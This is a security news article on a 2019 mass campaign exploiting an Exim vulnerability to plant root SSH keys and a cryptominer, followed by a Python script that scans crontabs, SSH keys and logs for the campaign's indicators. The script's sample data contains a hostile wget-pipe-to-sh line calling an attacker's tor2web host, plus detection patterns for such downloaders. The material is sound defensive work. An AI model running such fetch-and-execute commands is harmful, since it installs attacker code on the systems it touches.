Massive attack on vulnerable Exim mail servers

Security researchers from Cybereason have warned mail server administrators about a large-scale automated attack that exploits a critical vulnerability (CVE-2019-10149) in Exim, disclosed last week. During the attack, the attackers achieve execution of their code with root privileges and install malware on the server to mine cryptocurrencies.

According to an automated June survey, Exim's share of mail servers is 57.05% (56.56% a year ago), Postfix is used on 34.52% (33.79%), Sendmail on 4.05% (4.59%) and Microsoft Exchange on 0.57% (0.85%). According to Shodan data, more than 3.6 million mail servers on the global network that have not been updated to the latest Exim release, 4.92, remain potentially vulnerable. About 2 million of the potentially vulnerable servers are located in the United States and 192 thousand in Russia. According to RiskIQ, 70% of servers running Exim have already moved to version 4.92.


Administrators are advised to install the updates urgently; the distributions prepared them last week (Debian, Ubuntu, openSUSE, Arch Linux, Fedora, EPEL for RHEL/CentOS). If the system runs a vulnerable version of Exim (4.87 through 4.91 inclusive), you need to make sure it has not already been compromised by checking crontab for suspicious commands and verifying that there are no extra keys in the /root/.ssh directory. An attack may also be indicated by activity in the firewall log involving the hosts an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io and an7kmd2wp4xo7hpr.onion.sh, which are used to download the malware.

The first attempts to attack Exim servers were recorded on June 9. On June 13 the attack became massive. After exploiting the vulnerability via tor2web gateways, a script is downloaded from the Tor hidden service (an7kmd2wp4xo7hpr) that checks whether OpenSSH is present (installing it if not), changes its configuration (permitting root login and key authentication) and then installs an RSA key for the root user, which gives the attackers privileged access to the system over SSH.

After the backdoor is in place, a port scanner is installed on the system to identify other vulnerable servers. The system is also searched for existing mining software, which is removed if found. In the final stage, the attackers' own miner is downloaded and registered in crontab. The miner is downloaded disguised as an ico file (in fact a zip archive with the password "no-password") containing an ELF executable for Linux with Glibc 2.7+.
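The checks recommended above (suspicious crontab entries, unexpected keys in /root/.ssh, firewall or proxy log lines involving the tor2web gateways) can be run offline over copies of those files. The following Python helper is an added example, not code from opennet.ru or Cybereason; the three host names come from the article, while the sample crontab, authorized_keys and log lines, the `ADMIN_KEY_INVENTORY` set and the `/CONSTRUCTED` URL paths are constructed for the demonstration.

```python
import re

# Hosts the article names as the malware download points.
IOC_HOSTS = ("an7kmd2wp4xo7hpr.tor2web.su", "an7kmd2wp4xo7hpr.tor2web.io",
             "an7kmd2wp4xo7hpr.onion.sh")
# Generic tor2web gateway / .onion proxy pattern (16-char v2 or 56-char v3 label):
# a mail server has no legitimate reason to reach any of them.
TOR_GATEWAY_RE = re.compile(r"\b[a-z2-7]{16,56}\.(?:tor2web|onion)\.[a-z]+", re.I)
# Cron entries that fetch code over HTTP with wget/curl.
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl)\b[^|;]*https?://", re.I)

# Constructed sample inputs (not real captures): one benign and one suspicious line each.
CRONTAB_SAMPLE = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * wget -q -O - http://an7kmd2wp4xo7hpr.tor2web.su/CONSTRUCTED | sh
"""
AUTH_KEYS_SAMPLE = """ssh-rsa AAAAB3Nza_CONSTRUCTED_ADMIN_KEY admin@mx1
ssh-rsa AAAAB3Nza_CONSTRUCTED_UNKNOWN_KEY admin@mx1
"""
ADMIN_KEY_INVENTORY = {"AAAAB3Nza_CONSTRUCTED_ADMIN_KEY"}   # blobs the admin actually issued
EGRESS_LOG_SAMPLE = """Jun 13 10:02:11 mx1 proxy: 10.0.0.5 CONNECT deb.debian.org:443 ALLOW
Jun 13 10:02:14 mx1 proxy: 10.0.0.5 GET http://an7kmd2wp4xo7hpr.tor2web.io/CONSTRUCTED ALLOW
"""


def scan_crontab(text):
    """Non-comment crontab lines that download over HTTP or name a tor2web/IoC host."""
    return [l.strip() for l in text.splitlines()
            if l.strip() and not l.lstrip().startswith("#")
            and (any(h in l for h in IOC_HOSTS) or TOR_GATEWAY_RE.search(l)
                 or DOWNLOADER_RE.search(l))]


def scan_authorized_keys(text, inventory):
    """Entries whose base64 key blob is not in the admin inventory.
    Match on the blob, not the comment: the comment field is attacker-controlled."""
    unknown = []
    for raw in text.splitlines():
        f = raw.split()
        if not f or f[0].startswith("#"):
            continue
        # Options such as command="..." may precede the key type; locate the type token.
        idx = next((i for i, t in enumerate(f) if t.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(f) or f[idx + 1] not in inventory:
            unknown.append(raw.strip())      # malformed lines are flagged as well
    return unknown


def scan_egress_log(text):
    """Firewall/proxy log lines referencing the IoC hosts or any tor2web gateway."""
    return [l for l in text.splitlines()
            if any(h in l for h in IOC_HOSTS) or TOR_GATEWAY_RE.search(l)]
```

In practice, feed the functions the output of `crontab -l -u root`, the contents of /etc/cron.d and /root/.ssh/authorized_keys, and whatever egress log the firewall or proxy keeps; a hit is a reason to treat the host as compromised and rebuild it rather than just remove the entry.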

Source: opennet.ru
